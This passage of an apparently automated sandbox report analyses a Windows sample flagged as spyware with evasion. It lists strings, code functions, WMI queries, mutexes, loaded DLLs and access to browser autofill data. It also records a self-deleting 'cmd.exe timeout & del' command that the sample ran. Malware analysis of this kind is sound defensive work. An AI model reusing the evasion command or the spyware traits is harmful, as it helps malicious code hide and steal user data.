Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: app.exe, 00000003.00000003.3182148991.0000000005603000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3178386939.00000000055E3000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3182859527.0000000005603000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: app.exe, 00000003.00000003.3245462405.00000000058E5000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3257419916.00000000055D6000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000003.00000003.3261882543.00000000055DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: app.exe, 00000003.00000003.3183161453.00000000058E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
Source: app.exe, 00000003.00000003.3188734917.00000000058E3000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=at
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=autoit
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: app.exe, 00000003.00000003.3182859527.00000000055E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setup
Source: app.exe, 00000003.00000003.3182859527.00000000055F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/setupMicrosoft
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.20:49788 version: TLS 1.2
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00424B38 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00424B38

System Summary

Source: app.exe Static PE information: section name: )m&
Source: app.exe.0.dr Static PE information: section name: )m&
Source: app.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: app.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025C02D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,0_2_025C02D0
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025C77D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_025C77D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025902D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,3_2_025902D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_025977D0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,3_2_025977D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: 3_2_02579E36 AcquireSRWLockExclusive,AcquireSRWLockExclusive,NtDeviceIoControlFile,RtlNtStatusToDosError,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,AcquireSRWLockExclusive,3_2_02579E36
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0040A44A: GetCurrentProcess,SetPriorityClass,CreateFileA,DeviceIoControl,CloseHandle,GetCurrentProcess,SetPriorityClass,0_2_0040A44A
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256E4900_2_0256E490
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A45440_2_025A4544
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D352A0_2_025D352A
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025985C90_2_025985C9
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D85F40_2_025D85F4
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02598A440_2_02598A44
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A4A880_2_025A4A88
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258BAB00_2_0258BAB0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02586B580_2_02586B58
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025A2B5E0_2_025A2B5E
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_02561B500_2_02561B50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256BB500_2_0256BB50
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D1B400_2_025D1B40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258DB7B0_2_0258DB7B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0258EB690_2_0258EB69
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B6B1B0_2_025B6B1B
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025EBB180_2_025EBB18
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256AB900_2_0256AB90
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0259585F0_2_0259585F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025ED8440_2_025ED844
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0256F8EC0_2_0256F8EC
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025D38900_2_025D3890
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025648A00_2_025648A0
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025B98A50_2_025B98A5
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025699500_2_02569950
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025739620_2_02573962
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_0257799F0_2_0257799F
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025C1E400_2_025C1E40
Source: C:\Users\user\Desktop\app.exeCode function: 0_2_025F0E400_2_025F0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_3_0552C3BF3_3_0552C3BF
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025702253_2_02570225
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255C38E3_2_0255C38E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A91D23_2_025A91D2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025501BB3_2_025501BB
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025511A03_2_025511A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E5F73_2_0258E5F7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256AA163_2_0256AA16
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02574A883_2_02574A88
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553ABA3_2_02553ABA
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02556B583_2_02556B58
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255DB7B3_2_0255DB7B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255EB693_2_0255EB69
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256585F3_2_0256585F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A18623_2_025A1862
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025898A53_2_025898A5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02561E403_2_02561E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255AE373_2_0255AE37
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557C6F3_2_02557C6F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02553C053_2_02553C05
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02584D4A3_2_02584D4A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0256BD083_2_0256BD08
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A32393_2_025A3239
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025732243_2_02573224
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025872D73_2_025872D7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025942F53_2_025942F5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257628E3_2_0257628E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0259F3403_2_0259F340
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A430E3_2_025A430E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A632B3_2_025A632B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025363203_2_02536320
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025753DD3_2_025753DD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD3D03_2_025BD3D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025AD3C03_2_025AD3C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025B33893_2_025B3389
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C13BD3_2_025C13BD
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025730013_2_02573001
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0258E0303_2_0258E030
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254A0203_2_0254A020
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A20E33_2_025A20E3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B0903_2_0254B090
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE16F3_2_025BE16F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025331303_2_02533130
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257B13B3_2_0257B13B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B1F03_2_0253B1F0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025811803_2_02581180
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253A1B03_2_0253A1B0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025326703_2_02532670
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BE6053_2_025BE605
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254B6953_2_0254B695
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025906903_2_02590690
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257C6AE3_2_0257C6AE
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025477543_2_02547754
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254771C3_2_0254771C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254670C3_2_0254670C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025337903_2_02533790
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025524493_2_02552449
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025764683_2_02576468
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025334003_2_02533400
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025874D03_2_025874D0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025834D63_2_025834D6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253B4C03_2_0253B4C0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BF4C23_2_025BF4C2
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253E4903_2_0253E490
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025745443_2_02574544
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A352A3_2_025A352A
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025685C93_2_025685C9
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A85F43_2_025A85F4
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02568A443_2_02568A44
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0255BAB03_2_0255BAB0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02531B503_2_02531B50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253BB503_2_0253BB50
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572B5E3_2_02572B5E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A1B403_2_025A1B40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BBB183_2_025BBB18
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586B1B3_2_02586B1B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253AB903_2_0253AB90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BD8443_2_025BD844
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0253F8EC3_2_0253F8EC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A38903_2_025A3890
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025348A03_2_025348A0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025399503_2_02539950
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025439623_2_02543962
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0254799F3_2_0254799F
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02591E403_2_02591E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025C0E403_2_025C0E40
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02587E743_2_02587E74
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02579E363_2_02579E36
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02536EC03_2_02536EC0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586ECC3_2_02586ECC
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557EF13_2_02557EF1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257DEE03_2_0257DEE0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586F5B3_2_02586F5B
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_0257CF7C3_2_0257CF7C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542F213_2_02542F21
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02542C6E3_2_02542C6E
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02580C003_2_02580C00
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02567C093_2_02567C09
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025A5CD33_2_025A5CD3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586CC53_2_02586CC5
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BDCE63_2_025BDCE6
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02532C903_2_02532C90
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02557CA33_2_02557CA3
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_025BFCA73_2_025BFCA7
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02572D423_2_02572D42
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02577D143_2_02577D14
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02578D253_2_02578D25
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02594DD03_2_02594DD0
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exeCode function: 3_2_02586DD23_2_02586DD2
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe E9BC44CF548A70E7285499209973FAF44B7374DECE1413DFCDC03BF25A6C599C
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: String function: 025BCAF0 appears 156 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: String function: 02533D50 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: String function: 025ADE90 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Code function: String function: 025BC9A0 appears 60 times
Source: C:\Users\user\Desktop\app.exe Code function: String function: 00416398 appears 132 times
Source: C:\Users\user\Desktop\app.exe Code function: String function: 025ECAF0 appears 112 times
Source: C:\Users\user\Desktop\app.exe Code function: String function: 00416EF8 appears 50 times
Source: C:\Users\user\Desktop\app.exe Code function: String function: 025EC9A0 appears 45 times
Source: C:\Users\user\Desktop\app.exe Code function: String function: 02563D50 appears 73 times
Source: app.exe, 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs app.exe
Source: app.exe, 00000003.00000000.2681579898.000000000044D000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilename vs app.exe
Source: app.exe Binary or memory string: OriginalFilename vs app.exe
Source: app.exe.0.dr Binary or memory string: OriginalFilename vs app.exe
Source: app.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: app.exe.0.dr Binary string: Could not open \device\physicalmemory
Source: app.exe.0.dr Binary string: Could not map view of %X length %XCould not open \device\physicalmemory\device\physicalmemoryRtlNtStatusToDosErrorNtMapViewOfSectionNtOpenSectionNtUnmapViewOfSectionntdll.dllRtlInitUnicodeString%c
Source: classification engine Classification label: mal100.spyw.evad.winEXE@10/6@1/2
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_025C2A50 GetModuleHandleW,FormatMessageW,GetLastError,HeapFree
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_0040A130 GetVersionExA,CoCreateInstance,CoSetProxyBlanket,VariantInit,lstrlenW,lstrcpynA,WideCharToMultiByte
Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00423119 EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Mutant created: \Sessions\1\BaseNamedObjects\hrzbaov
Source: C:\Users\user\Desktop\app.exe File created: C:\Users\user\AppData\Local\Temp\7041956494665639546
Source: app.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\Desktop\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\app.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\app.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: app.exe, 00000003.00000003.3188734917.00000000058E1000.00000004.00000020.00020000.00000000.sdmp, Web Data.3.dr Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: app.exe Virustotal: Detection: 11%
Source: C:\Users\user\Desktop\app.exe File read: C:\Users\user\Desktop\app.exe
Source: unknown Process created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
Source: C:\Users\user\Desktop\app.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\app.exe Process created: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe "C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe"
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c timeout /t 5 & del /f /q C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe && exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\app.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: oledlg.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\app.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7041956494665639546\app.exe Section loaded: wbemcomn.dll
